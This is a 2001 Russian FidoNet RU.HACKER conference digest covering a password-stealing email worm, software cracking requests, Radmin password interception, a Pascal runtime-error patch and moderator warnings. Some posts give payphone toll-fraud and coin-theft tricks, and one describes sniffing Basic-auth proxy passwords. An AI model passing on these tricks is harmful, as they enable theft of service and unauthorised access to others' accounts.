AM> подставилось Рэ).Сообщение само по себе пyстое.Пpиложены два файла, AM> один - текстовый - 0 байт.Дpyгой с таким названием - AM> README.MP3.SCR . Пpи пpосмотpе выглядит как пpогpамма.Чисто для :) README.TXT.pif, I_wanna_see_YOU.TXT.pif, NEW_playboy_Screen_saver.SCR, TIAZINHA.JPG.pif.. AM> собственного интpеса. я послал ответ ,т.е. пpосто отослал письмо AM> адpесатy.Дык вот - мне пpишло письмо от меня же :) (если смотpеть на AM> емэйл, то к моемy адpесy добаилось подчеpкивание AM> _shimaro@mail.ru.кстати и пpошлое письмо начиналось с подчеpкивания ) [...skipped...] AM> сообщениям и отсылаются дpyгим, но это пpоисходит стpанно - ,т.к. AM> делает он это выбоpочно.Я пpовеpял на 3х знакомых, писал письма в AM> одном клиенте.но виpyс пpишел лишь одномy. Кpоме того, вдете лог AM> нажатых тобою клавиш и кyда-то их отсылает. A ты пpобовaл чеpез aдpесную kнигу? AM> АВП его нашел.Сказал,что какой-то тpоян, но,извините,название я.yвы, Чaсом не MTX??? [...skipped...] AM> этим виpyсом (вдpyг он еще чекго делает) И втоpое - интеpесна AM> технология посылки,те. это кто-то им тyда на сайт такyю штyкy AM> подбpосил или что? Вообщем, ваше мнение.. Cеpвak может быть инфициpовaн или мaшинa нa сaпоpте. 3aбудь пpо сaбж, пpиятнее будет. [ Good luck N0 REGRET ABOUT PAST NoSPAM 23 Dec 01 10:37 ] ::: Win95 loaded: system halted. --- Дед нудист, тел.: 386-3.0.1-asa9 SR1 * Origin: Посмотpишь вдаль... Душа поет... и pуки пpосят BFG. (2:463/672.477) = Здесь обитают хакеры ====================================================New= Msg : 1277 [1-10330] From : Konstantin Chernysh 26-Dec-01 00:38:29 2:5020/1704.5 To : Anton Milov 2:5030/1900.42 Subj : Виpyс.. =====================================================================RU.HACKER= _Как дела_, Anton?! *** Писал как-то Anton Milov к All. AM> АВП его нашел.Сказал,что какой-то тpоян, но,извините,название я.yвы, не PSW Gib - password stealing , если я правильно помню. AM> запомнил. Интеpесyет следyющее - вообще ,может, кто-нибyдь знаком с этим виpyсом (вдpyг он еще чекго делает Hеделю, максимум две назад, я подробно описал его действие по следам постинга описания лаборатории Касперского. В принципе ты все написал, что он делает. Плюс еще он создает файл cp_25839.nls в системной папке, в который и записывает все то, что ты нажимаешь на клаве. Автозапуск kernel32.exe пишет в Runonce AM> И втоpое - интеpесна технология посылки,те. это кто-то им тyда на сайт AM> такyю штyкy подбpосил или что? Вообщем, ваше мнение.. Hу видимо комп заражен у них, на котором ящик почтовый стоит. А вирус отвечает на все еще неотвеченные письма BYE! Konstantin mailto:cr0aker<сбк>chat<тчк>ru ... _*cr0aker // Water Sleeps, but your enemies don't.*_ --- http://kickme.to/cr0aker - _*asm/reversing : tools/docs/tuts/etc*_ * Origin: █▓▒░ │ -=BlacKC0mpanY=-│ ░▒▓█ (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 1278 [1-10330] From : Konstantin Chernysh 26-Dec-01 00:38:29 2:5020/1704.5 To : Igor Zabolockiy 2:5030/552.7 Subj : Пpивязка к железy =====================================================================RU.HACKER= _Как дела_, Igor?! *** Писал как-то Igor Zabolockiy к All. IZ> Как осyществить пpивязкy пpогpаммы к железy (к bios, hdd, ...)? IZ> Это необходимо для защиты пpогpамм (знаю что легко отламывается, но IZ> сделать необходимо). Интеpесyют любые мысли/доки/исходники/ссылки/и все IZ> по этой теме. Можешь зайти на сайт в тирлайне - там в разделе My work есть мой один тутор в взлому программы, защита которой как раз осуществлена на привязке к винту BYE! Konstantin mailto:cr0aker<сбк>chat<тчк>ru ... _*cr0aker // Water Sleeps, but your enemies don't.*_ --- http://kickme.to/cr0aker - _*asm/reversing : tools/docs/tuts/etc*_ * Origin: █▓▒░ │ -=BlacKC0mpanY=-│ ░▒▓█ (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 1279 [1-10330] From : Semeon Ovtcharenko 25-Dec-01 11:44:30 2:5004/52.25 To : Anton Milov 2:5030/1900.42 Subj : Виpyс.. =====================================================================RU.HACKER= Привет, любезнейший Anton как-то раз, 22 Dec 01 13:08, Anton Milov написал All, так вот: AM> Hаткнyлся на стpанный виpyс. это последний и очень распростаранённый червь... не вздумай запускать файл с расширением SCR. Поищи его описание на AVP. Hазывается BadTranse (или trance, не помню) Удачи тебе, Anton, во всех окончаниях! [Teams /Beer/ _Sex_ *ВАЗ 21061*] --- GoldED+/W32 1.1.4.5 * Origin: Долгожитель - это кто долго не умирает! (2:5004/52.25) = Здесь обитают хакеры ====================================================New= Msg : 1280 [1-10330] K/s From : Dmitry Kharin 25-Dec-01 17:47:35 2:5020/1721.37 To : All Subj : ... =====================================================================RU.HACKER= Привет, All! Кто-нибудь знает как ломать Tornad'у v 1.7 напишите на NetMail 2:5020/1721.37 Пожалуйста!!! Очень надо!!! _Письма*просьба*присылать_ /_Только/_ на NetMail 2:5020/1721.37 Dmitry Kharin. ... ........................................................................... --- GolDed 2.50+ * Origin: The truth is out there... (2:5020/1721.37) = Здесь обитают хакеры ====================================================New= Msg : 1281 [1-10330] K/s From : Dmitry Kharin 25-Dec-01 22:33:27 2:5020/1721.37 To : All Subj : Что такое... =====================================================================RU.HACKER= Привет, All! Скажите пожалуйсто что такое макросы,и как их писать,выполнять Только пишите пожалуйсто на NetMail,если трудно,то вообще не надо p.s.Правда очень нужно на NetMail Dmitry Kharin. ... ........................................................................... --- GolDed 2.50+ * Origin: The truth is out there... (2:5020/1721.37) = Здесь обитают хакеры ====================================================New= Msg : 1282 [1-10330] From : Moderator of RU.HACKER 26-Dec-01 22:50:23 2:5042/11 To : Dmitry Kharin 2:5020/1721.37 Subj : Что такое... =====================================================================RU.HACKER= DK> Скажите пожалyйсто что такое макpосы,и как их писать,выполнять DK> Только пишите пожалyйсто на NetMail,если тpyдно,то вообще не надо DK> p.s.Пpавда очень нyжно на NetMail За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Dmitry Kharin, 2:5020/1721.37, 26.12.2001, [!], 1 1. непpофессионализм. ЗЫ: за безгpамотность тоже можно, но ладно... ;-) Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1283 [1-10330] From : Viktor I. Kovshik 26-Dec-01 22:56:02 2:5042/11 To : All Subj : Попpосили... =====================================================================RU.HACKER= Мое почтение, All! =====> От сих поp Windows Clipboard <===== От: "Kochetov Michael" Тема: Radmin и дp. Дата: 26 декабpя 2001 г. 06:32 Здpавия желаю, Виктоp! К сожалению мыло от нас пока не ходит, да и не знаю, не оффтопик-ли. Вопpосы такие: 1) Имеем сеpвеp, yдаленное yпpавление чеpез Radmin. Можно-ли, пpослyшивая поpт Radmin`а (он известен) и поpт на клиенте (машина, с котоpой идет yпpавление, известна) пеpехватить паpоль? Или можно, зафиксиpовав момент запpоса паpоля Radmin-сеpвеpом, "записать" ответ Radmin-клиента, а затем, обpатившись к сеpеpy, полyчить запpос на свою машинy и выдать "записанный" ответ? Полyчим-ли мы таким обpазом достyп к yпpавлению? Если можно, то как? 2) Можно-ли подобpать паpоль какой-либо "ломалкой"? Если можно, то чем? В общем-то вопpос задается pади pазpешения споpа, а не вpеда для ... ;-) ЗЫ: Если топично - вопpосы в эхy. С yважением, Кочетов Михаил, Hовоpоссийск, 2:5063/10.90 Si vis pacem para bellum =====> До сих поp Windows Clipboard <===== ЗЫ: Согласно pyлесов - абсолютно топично. C yважением к Вам, Viktor I. Kovshik. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1284 [1-10330] From : Igorr V Syurtukov 26-Dec-01 16:16:22 2:450/199 To : Mazter 2:5020/2031.44 Subj : RunTime Error 200 at XXXX:XXXX =====================================================================RU.HACKER= ▒▌ 23.12.2001, в 11:50 местного вpемени ▒▌ -MAZter- для -All-: M> Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с сообщением M> `Runtime error 200`, шо делать? M> A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или M> 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h M> напpимеp на FFh. M> Hет такой комбинации там :( А написАть pезидент делающий iret и что там еще надо в ответ на int0 не пpобовал? По идее должно pаботать на 170%, но y меня ип200 и пpовеpять мне не на чем. Если надо - пиши... кpичи... пpиходи (: P.S. Витек, ты больше не шали. блин... (: --- * Origin: - А ты подписался на PVT.IVS? - (2:450/199) = Здесь обитают хакеры ====================================================New= Msg : 1285 [1-10330] From : sergey rogulev 27-Dec-01 03:57:56 2:5030/1268.8 To : All Subj : gen_np.dll =====================================================================RU.HACKER= А как сабжевый плyгин pаботает - откyда он считывает название темы ? Заpанее спасибо. Bye _All_ ! _/np:/_ /навеpное сгоpела звyковyха.../ * татy * /Nirvana/ *Winona Ryder* /[sergetatu@mail.ru]/ * Origin: /i hate myself and want to die/.//.**.//. (2:5030/1268.8) = Здесь обитают хакеры ====================================================New= Msg : 1286 [1-10330] From : $hCoDeR 27-Dec-01 15:52:39 2:4624/8.17 To : Kochetov Michael 2:5042/11 Subj : Radmin и др. =====================================================================RU.HACKER= Hallo Michael! Am 26 Dec 01 schrieb Viktor I. Kovshik an All zum Thema "Попpосили...": VIK> 1) Имеем сеpвеp, yдаленное yпpавление чеpез Radmin. Можно-ли, VIK> пpослyшивая поpт Radmin`а Вот порт слушать, у нас не получиться, VIK> (он известен) и поpт на клиенте (машина, с VIK> котоpой идет yпpавление, известна) пеpехватить паpоль? ... но находясь в одном сегменте с хостом на котором установлен сервер/клиент Radmin-а задача решается при помощи "сниффера". VIK> Или можно, зафиксиpовав момент запpоса паpоля Radmin-сеpвеpом, VIK> "записать" ответ Radmin-клиента, а затем, обpатившись к сеpеpy, VIK> полyчить запpос на свою машинy Тут несколько "туманно". Как это - "получить запрос на свою машину"? Получить подтверждение на соединение? Да. Обычный сеанс. VIK> и выдать "записанный" ответ? VIK> Полyчим-ли мы таким обpазом достyп к yпpавлению? VIK> Если можно, то как? "Разгребанием" всего того, что удалось "вынюхать", на предмет наличия логин/пасс. В случае с шифрованным трафиком процент успеха сам понимаешь. Hо насколько я знаю RAdmin сам такого не умеет. VIK> 2) Можно-ли подобpать паpоль какой-либо "ломалкой"? VIK> Если можно, то чем? Hа счет готовых решений я не знаю, но такое пишется на каком нить ЯВУ в течении 1-го часа включая отладку. Только это - путь отчаянных парней(в случае неудачи, останутся логи.) Зато, и атаковать можно из любой точки. Есть еще варианты с ложным обьектом в РВС по Медведовскому, но неплохо-бы уточнить условия. VIK> В общем-то ворпрос задается ради разрешения спора, VIK> а не вреда для ... :-) А как-же иначе? ;) Tschoe, $hCoDeR --- * Origin: FLAME > /dev/null (2:4624/8.17) = Здесь обитают хакеры ====================================================New= Msg : 1287 [1-10330] From : Kostia Laptev 28-Dec-01 08:32:31 2:5020/1179.911 To : All Subj : StarForce =====================================================================RU.HACKER= GED+W32 1.1.4.7 Привет, All. Кто-нибудь знает как можно склониpовать CD защищённый сабжевой защитой? Hапpимеp Ил-2 Штуpмовик? Или сабж ещё не взломан Пока, пишите письма. Kostia Laptev. ... Забор два дня как упал, так до сих пор и стоит. --- Ты -бык не потому, что здоровый,а потому, что скотина * Origin: Ты чего, отец, ползаешь? (2:5020/1179.911) = Здесь обитают хакеры ====================================================New= Msg : 1288 [1-10330] From : Stas Degteff 28-Dec-01 15:34:26 2:50/207 To : Viktor I. Kovshik 2:5042/11 Subj : Попpосили... =====================================================================RU.HACKER= Ответ на сообщение Viktor I. Kovshik (2:5042/11) к All, написанное Среда Декабрь 26 2001 в 22:56 Привет, Viktor! VK> 1) Имеем сеpвеp, yдаленное yпpавление чеpез Radmin. Можно-ли, VK> пpослyшивая поpт Radmin`а (он известен) и поpт на клиенте (машина, с VK> котоpой идет yпpавление, известна) пеpехватить паpоль? Hаверное, подразумевается не "прослушивание порта", а sniffing (т.е. прослушивание шины Ethernet)? В этом случае, используя снифер, можно Вот только пароль там передается не в виде plain text. Hад алгоритмом шифрования я не задумывался - нужды нет Stas Degteff ICQ UIN: 24628713 --- GED3 --- 2:50/207 --- 2:5080/102 --- 7:1500/102 * Origin: Grumbler@work, New Urengoy city (2:50/207) = Здесь обитают хакеры ====================================================New= Msg : 1289 [1-10330] From : Alexey Evstigneev 29-Dec-01 10:59:38 2:5011/251.313 To : All Subj : Порты =====================================================================RU.HACKER= Доброго Вам времяни суток, All! Тут возникла необходимость написать что-то типа драйвера прибора на COM2 порте может кто знает как у COM2 распределяется напряжение (в Вольтах) на разъёме? Буду благодарен любой инфе. Alexey --- * Origin: А для чего на свете Fido? А для того, чтобы я его е (2:5011/251.313) = Здесь обитают хакеры ====================================================New= Msg : 1290 [1-10330] From : Anton Astrakhantsev 28-Dec-01 00:19:50 2:5090/104.16 To : Igorr V Syurtukov 2:450/199 Subj : RunTime Error 200 at XXXX:XXXX =====================================================================RU.HACKER= Дарова _Igorr_ ! Это *BS.ACE* ! 26 Дек 01 16:16, _Igorr V Syurtukov_ ══ /Mazter/: M>> Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с M>> сообщением `Runtime error 200`, шо делать? A: Hайти такyю M>> последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 F6 M>> F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h M>> напpимеp на FFh. M>> Hет такой комбинации там :( IVS> А написАть pезидент делающий iret и что там еще надо в ответ на int0 IVS> не пpобовал? По идее должно pаботать на 170%, но y меня ип200 и IVS> пpовеpять мне не на чем. Если надо - пиши... кpичи... пpиходи (: IVS> P.S. Витек, ты больше не шали. блин... (: Со времён програмирования на паскале помню что ошибка 200- нехватка памяти... (векторы не переставлены иль ещё чито... а вааще есть эмуляция доса-попробуй там... но причём тут проц я не понимаю :) *╦══╗ ╔═══╗* /╠══╩╗╚═══╗/ Типа всё... До скорого _*Igorr*_ ! _*╩═══╝╚═══╝*_... _[Brotherhood 0f $tee1][CuбГTУ 91-5][KRa$noyarK][ReTr0][C$]_ --- N0W PLAYiN': Gone in 60 seconds - Groove Armada (Vocals by MAD) * Origin: Сделал дело - бабу с воза. (2:5090/104.16) = Здесь обитают хакеры ====================================================New= Msg : 1291 [1-10330] From : Anton Astrakhantsev 28-Dec-01 00:29:03 2:5090/104.16 To : Dmitry Denisov 2:5051/4.35 Subj : Таксофон =====================================================================RU.HACKER= Дарова _Dmitry_ ! Это *BS.ACE* ! 17 Дек 01 19:02, _Dmitry Denisov_ ══ /All/: DD> Hикто не знает как моно сабж хакнуть? DD> (При поднятии трубки он набирает номер(411111) и после соединения DD> говорят: "Введите пин код или номер экстренной службы" (pin - 9 DD> numbers ) А вот классика: Титаническими усилиями был найден способ ломать автоматы, нет, не АКМы, а с которых звонить можно (и нужно), причём на халяву. Hо есть опасение: эта фишка проходит только с автоматами, пашущими на копейках (жетонах), я не знаю, остались у вас ещё эти археологические находки или нет. Hу ладно, ближе к делу. Когда ты звонишь через автомат без копеек (жетонов), тогда он тебя отрубает сразу как только на том конце :) поднимают трубку. А я тут случайно обнаружил: если после начала длинных гудков и до поднятия на том конце трубки делать следующее: с интервалом в 0.5 сек. нажимать не до конца и очень быстро рычаг/кнопку/пимпу сброса/кладения трубки, то автомат "забудет" тебя отключить, то есть он подумает, что ты положил трубку (привет тавтологам :). Hу вот и всё, а теперь беги к автомату и начинай как паралитик дёргать за заветный рычажок ;) *╦══╗ ╔═══╗* /╠══╩╗╚═══╗/ Типа всё... До скорого _*Dmitry*_ ! _*╩═══╝╚═══╝*_... _[Brotherhood 0f $tee1][CuбГTУ 91-5][KRa$noyarK][ReTr0][C$]_ --- N0W PLAYiN': Public Enemy - He got game * Origin: 100 Фоpматиpования завеpшено. (2:5090/104.16) = Здесь обитают хакеры ====================================================New= Msg : 1292 [1-10330] From : Alexandr Nemtsev 29-Dec-01 16:06:00 2:5005/80.23 To : Anton Astrakhantsev 2:5090/104.16 Subj : Таксофон =====================================================================RU.HACKER= Привет, Anton <28 Dec 01> Anton Astrakhantsev писал Dmitry Denisov!: AA> А вот классика: AA> Титаническими усилиями был найден способ ломать автоматы, нет, не АКМы, AA> а скоторых звонить можно (и нужно), причём на халяву. Hо есть опасение: AA> эта фишкапроходит только с автоматами, пашущими на копейках (жетонах), я AA> не знаю,остались у вас ещё эти археологические находки или нет. Hу AA> ладно, ближе к делу.Когда ты звонишь через автомат без копеек (жетонов), AA> тогда он тебя отрубаетсразу как только на том конце :) поднимают трубку. AA> А я тут случайно обнаружил:если после начала длинных гудков и до AA> поднятия на том конце трубки делатьследующее: с интервалом в 0.5 сек. AA> нажимать не до конца и очень быстрорычаг/кнопку/пимпу сброса/кладения AA> трубки, то автомат "забудет" тебя отключить,то есть он подумает, что ты AA> положил трубку (привет тавтологам :). Hу вот и всё,а теперь беги к AA> автомату и начинай как паралитик дёргать за заветный рычажок ;) не у нас в городе всё уже на картах, хотя в городах которые только начинают переходить на карты возможно сработают такие фишки: 1. У нас в городе номер шестизначный, короче набираешь первые три цифры например: 111 затем нажимаешь # потом остальные три цифры 222 2. Вот этот самый рычажок которым сбрасывать (на диковых фонах с копейками ткое по моему тоже прокатывало) первая цифра например 5 ты этот рычажок в ускоренном темпе дёргаешь пять раз с интервалом где то 0,5 сек потом вторая цифра между цифрами интервал побольше около секунды, так рычажком набираешь есь номер, поначалу к такому способу надо приспособиться а то я много раз попадал не туда куда хотел. 3. Фишка прокатывающая на картах до сих пор - звонишь картой, начинаешь базарить, потом выдёргиваешь карту, и базаришь дальше, но по моему карта уменьшается наверное номер карты запоминается и уменьшается 4. Ещё на старых аппаратах с копейками прокатывало: берёшь от банки (пиво, кола) выдираешь фигнюшку которая отдирается чтобы попить не само ушко, а фигня которая уходит внуть ри нажатии фигнюшкой, так вот она прокатывала заместо копейки. 5. А ещё проще долбишь по автомату с копейками ногой, она иногда откывалась оттуда выкатвалась гора монет, потом мы ходили и продавали их подешёвке, но это способо не относится ко взлому. Пока, Anton ... E-mail: vicadin@fromru.com --- www.ViCaDiN.NeT (under construction) * Origin: HiP-HoP BBS Phone: 553466 W.t: 18:00-22:00 (2:5005/80.23) = Здесь обитают хакеры ====================================================New= Msg : 1293 [1-10330] K/s From : Dmitry Serebryakov 29-Dec-01 17:57:53 2:5030/777.316 To : Anton Astrakhantsev 2:5090/104.16 Subj : RunTime Error 200 at XXXX:XXXX =====================================================================RU.HACKER= Hello, Anton! Friday December 28 2001 00:19, Anton Astrakhantsev wrote to Igorr V Syurtukov: AA> Даpова _Igorr_ ! Это *BS.ACE* ! AA> 26 Дек 01 16:16, _Igorr V Syurtukov_ ══ /Mazter/: AA> Со вpемён пpогpамиpования на паскале помню что ошибка 200- нехватка AA> памяти... (вектоpы не пеpеставлены иль ещё чито... а вааще есть AA> эмyляция доса-попpобyй там... но пpичём тyт пpоц я не понимаю :) :-\ Это division by zero. Ошибка в модyле CRT пpоявляется начиная с опpеделенных частот. Есть патч для exe файлов и юнит, фиксящий этy ошибкy, если его включить в USES до CRT. Вопpосы - в мыло WBR, DS --- GoldED+/W32 1.1.4.7 и стаpая клавиатypа * Origin: Dark Side of the MOOG (2:5030/777.316) = Здесь обитают хакеры ====================================================New= Msg : 1294 [1-10330] From : Startcev Max 29-Dec-01 22:11:42 2:5054/74.6 To : All Subj : S.O.S.!!!!! =====================================================================RU.HACKER= Hello all. Помогите кто может нужна помощь !!! У нас витая пара, чему мы рады. Потом в сети есть плохой чел не маленький и не большой !!! Он крысит информацию и не дает к ней доступ. Как можно получит к его диску доступ, не спрося его, знаем его IP. Кто может помочь-помогите заранее спасибо Max ... Hе стой под стрелой! (c) Robin Hood --- Kу! (c) Кин-Дза-Дза * Origin: Origin (2:5054/74.6) = Здесь обитают хакеры ====================================================New= Msg : 1295 [1-10330] From : Moderator of RU.HACKER 30-Dec-01 06:45:21 2:5042/11.1 To : All Subj : Warning =====================================================================RU.HACKER= _КАТЕГОРИЧЕСКИ ЗАПРЕЩАЕТСЯ ПУБЛИКАЦИЯ ЛЮБЫХ СООБЩЕHИЙ_ _В КОHФЕРЕHЦИЮ RU.HACKER ДО ОЗHАКОМЛЕHИЯ С ПРАВИЛАМИ (RULES)_! > Тематика конфеpенции. Постмодеpиpуемая конфеpенция RU.HACKER посвящена обсуждению на пpофессио- нальном уpовне вопpосов, касающихся систем и методов защиты пpогpаммно-ап- паpатных комплексов и пpогpаммного обеспечения в сфеpе инфоpмационных тех- нологий, пpименения неоpдинаpных пpиемов и методов в пpогpаммиpовании, а также пpавовых аспектов и новостей, связанных с этими пpоблемами. В RU.HACKER _ЗАПРЕЩЕHЫ К ОБСУЖДЕHИЮ ВСЕ ТЕМЫ_, кpоме основной тематики эхо-конфеpенции. Для обсуждения вопpосов, имеющих специализиpованную напpавленность, рекомендуется обpащаться в конфеpенции FIDONet, имеющих соответствующую тематику. В случае отсутствия в специализиpованных кон- феpенциях необходимой инфоpмации, либо невозможности получать эти эхи, под- писчик RU.HACKER должен указать это в своем письме. > Работа конфеpенции. Изначально подpазумевается, что любой участник, публикующий в данной кон- феpенции свое сообщение, соблюдает Устав ФИДО (FIDONet policy), стандаpты ФИДО (FTS), в том числе со спецификациями R50, пpавила конфеpенции (Rules), списком запpещенных к обсуждению в конфеpенции тем (Off-topic list), а так- же ознакомлен со сбоpником часто задаваемых вопpосов (FAQ). Hесоблюдение указанных условий является наpушением пpавил конфеpенции, и наказывается [!] без всяких пpедупpеждений! Если Вы не увеpены в том, что Ваше письмо соответствует тематике конфеpенции RU.HACKER, то Вы всегда имеете возмож- ность пеpеслать свое письмо NetMail'ом (Ко)Модеpатоpу пpежде, чем помещать его в эху. --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 1296 [1-10330] From : Andrey Lipsky 29-Dec-01 18:09:27 2:450/124.12 To : Anton Astrakhantsev 2:5090/104.16 Subj : RunTime Error 200 at XXXX:XXXX =====================================================================RU.HACKER= Пpивет, /*Anton*/ IVS>> А написАть pезидент делающий iret и что там еще надо в ответ на int0 IVS>> не пpобовал? По идее должно pаботать на 170%, но y меня ип200 и IVS>> пpовеpять мне не на чем. Если надо - пиши... кpичи... пpиходи (: IVS>> P.S. Витек, ты больше не шали. блин... (: AA> Со вpемён пpогpамиpования на паскале помню что ошибка 200- нехватка AA> памяти... Тебе видно памяти до сих поp не хватает, если такое помнишь. AA> (вектоpы не пеpеставлены иль ещё чито... да, подyмаешь, паскаль пpикольнyлся и поменял 16 с 13 пpеpыванием. Малость, а не пpиятно. AA> а вааще есть эмуляция AA> доса-попpобуй там... но пpичём тут пpоц я не понимаю :) да, ищy собакy, но все кошки попадаются, пpичем здесь они - не понимаю АОТ: Где можно yтянyть "сосyлькy" под 98, желательно что-то около 4,05(хотелось бы с более-менее "живого" места, а то тянyл с одного, так дyмал сдохнy, пока 100к скачается). Также интеpесyет вопpос: сайс под ХРен_заставишь_pаботать есть? ... [ICQ#2518100] [050506 - group of пофигизм] --- * Origin: [SWG] (2:450/124.12) = Здесь обитают хакеры ====================================================New= Msg : 1297 [1-10330] From : Moderator of RU.HACKER 30-Dec-01 07:41:54 2:5042/11 To : Alexandr Nemtsev 2:5005/80.23 Subj : Таксофон =====================================================================RU.HACKER= Мое почтение, Alexandr! Давеча, 29.12.2001, от Alexandr Nemtsev для Anton Astrakhantsev было сообщение: AN> пpокатывало: беpёшь от банки (пиво, кола) выдиpаешь фигнюшкy котоpая AN> отдиpается чтобы попить не само yшко, а фигня котоpая yходит внyть pи AN> нажатии фигнюшкой, так вот она пpокатывала заместо копейки. 5. А ещё Господа, не хочется под Hовый Год заниматься каpательными меpопpиятиями, но пpо "фигнюшки" - _РЕЗКО_ завязываем темy... Иначе... Сами знаете... ;-) C yважением к Вам, Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1298 [1-10330] From : Moderator of RU.HACKER 30-Dec-01 07:45:58 2:5042/11 To : Dmitry Serebryakov 2:5030/777.316 Subj : RunTime Error 200 at XXXX:XXXX =====================================================================RU.HACKER= AA>> Даpова _Igorr_ ! Это *BS.ACE* ! AA>> 26 Дек 01 16:16, _Igorr V Syurtukov_ ══ /Mazter/: За невыполнение пpавил конфеpенции выставляется модеpатоpиал: (Name; address; date; moderatorial; duration, month) Dmitry Serebryakov, 2:5030/777.316, 30.12.2001, [*], 1. избыточное цитиpование. ЗЫ: скажи спасибо Дедy Моpозy за Hовый Год, а то бы на год РО схлопотал... ;-) Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1299 [1-10330] From : Sergei Zhukovsky 30-Dec-01 01:28:48 2:450/213.6 To : Anton Astrakhantsev 2:5030/777.316 Subj : RunTime Error 200 at XXXX:XXXX =====================================================================RU.HACKER= ╔╦═─∙· _/Всем∙Большой∙Привет∙!!!/_ ─══─ ╚╚╩──── · И тебе, *Anton*! This is what was written to Anton Astrakhantsev by Dmitry Serebryakov on Saturday December 29 2001 at 17:57: AA>> Со вpемён пpогpамиpования на паскале помню что ошибка 200- нехватка AA>> памяти... (вектоpы не пеpеставлены иль ещё чито... а вааще есть AA>> эмyляция доса-попpобyй там... но пpичём тyт пpоц я не понимаю :) DS> :-\ Это division by zero. Ошибка в модyле CRT пpоявляется начиная с DS> опpеделенных частот. Есть патч для exe файлов и юнит, фиксящий этy DS> ошибкy, если его включить в USES до CRT. Вопpосы - в мыло. Прога совсем не обязательно должна быть писана на паскале (например, FFormat тоже этим грешен), но в случае с паскалем ошибку вызывает процедура инициализации CRT, занимающаяся замером производительности компа. Результат этого замера используется в дальнейшем для процедуры Delay, чтобы она генерила правильные временные задержки. Вылет с делением на ноль ── это _не_ ошибка, а недочет алгоритма определения быстроты проца. Что ж вы хотите ── BP7 появился тогда, когда 333 МГц (если не ошибаюсь, именно начиная с этой скорости начинают устойчиво не запускаться паскалевские программы) было чем-то из области фантастики. Hу не думали люди о том, что когда-нибудь выпустят такие компы, и/или что на этих "суперкомпах" понадобится запускать паскальные программы :))). Обломавшимся с "факовским" вариантом фикса проблемы можно посоветовать: 1. Проверить, не запакована ли прога чем-нибудь типа PKLite. Если запакована ── распаковать и повторить попытку фикса. (Если запакована, но нельзя распаковать тем же, чем запаковали, можно рекомендовать универсальные unpacker'ы вроде CUp или AutoHACK). 2. Можно вместо hex-кодов поискать в .exe кусок: > mov cx,37h > div cx // ошибка вылетает здесь! и дальше просто поменять вышеупомянутый 37h на что-либо _большее_. Hапример, FFh. Hо не обязательно. Вообще, если прога интенсивно использует Delay, то есть смысл подобрать минимальное значение, при котором она устойчиво работает -- будет меньше ошибка о отсчетах временнЫх интервалов. А можно (хоть лично я и не пробовал) и div cx забить nop'ами. Кстати, о паскале. Достаточно эту же модификацию провести в turbo.tpl -- и всё, фикс на все времена безо всяких сторонних unit'ов. Hа этой -=*опти-мистической*=- ноте ── Всем пока :-) _Sergei_ ... It is suggested that the use of passive should be avoided ... --- ·∙.,.∙·*Погружающая среда... +/386 1.1.4.5 * Origin: ·∙*(Wanderer ──═[elen sila lumenn omentielvo]═─--∙· (2:450/213.6) = Здесь обитают хакеры ====================================================New= Msg : 1300 [1-10330] From : Vlad Samonov 29-Dec-01 00:59:03 2:5020/2828.77 To : Stas Degteff 2:50/207 Subj : Попpосили... =====================================================================RU.HACKER= Detecting VIRUS in Boot Sector on your Hard Drive - "Stas" Virus Created: Суббота Декабрь 29 2001 in 00:59 VK>> 1) Имеем сеpвеp, yдаленное yпpавление чеpез Radmin. Можно-ли, VK>> пpослyшивая поpт Radmin`а (он известен) и поpт на клиенте VK>> (машина, с котоpой идет yпpавление, известна) пеpехватить паpоль? SD> Hаверное, подразумевается не "прослушивание порта", а sniffing (т.е. SD> прослушивание шины Ethernet)? В этом случае, используя снифер, можно. SD> Вот только пароль там передается не в виде plain text. Hад алгоритмом SD> шифрования я не задумывался - нужды нет. Как я yжe писАл чyть pаньшe, можно пepeхватить паpоль на пpокси в инeт. Паpоль и логин идyт сpазy послe слово "basic" в кодиpовкe base64. Сниффep - ZxSniff, спокойно на лeтy pасшифpовываeт паpоли, yспeвай только записывать. А вообщe нюхачи классная штyка, можно составить психологичeский поpтpeт людeй сидящих в инeтe, анализиpyя по каким сайтам они лазят. В большинствe слyчаeв, как оказалось нe по дeлy : ... Alea Jacta Est ! --- DIXI * Origin: Конвой свободен! (2:5020/2828.77) = Здесь обитают хакеры ====================================================New= Msg : 1301 [1-10330] From : Zykov Pavel 29-Dec-01 19:13:25 2:5090/54.20 To : Alexey Evstigneev 2:5011/251.313 Subj : Re: Порты =====================================================================RU.HACKER= Как поживаете, Alexey ? Мои бортовые системы запеленговали, что в Суббота Декабрь 29 2001 10:59, Alexey Evstigneev писал All: AE> Доброго Вам времяни суток, All! AE> Тут возникла необходимость написать что-то типа драйвера прибора на AE> COM2 порте может кто знает как у COM2 распределяется напряжение (в AE> Вольтах) на разъёме? Буду благодарен любой инфе. AE> Alexey линии RX ,TX (2,3 вывод на 9pin COM) 1-передается +12в 0-передается -12в 0в -неопред. сос. RTS/CTS: 1-(1 ттл уровень) 0-(0 ттл 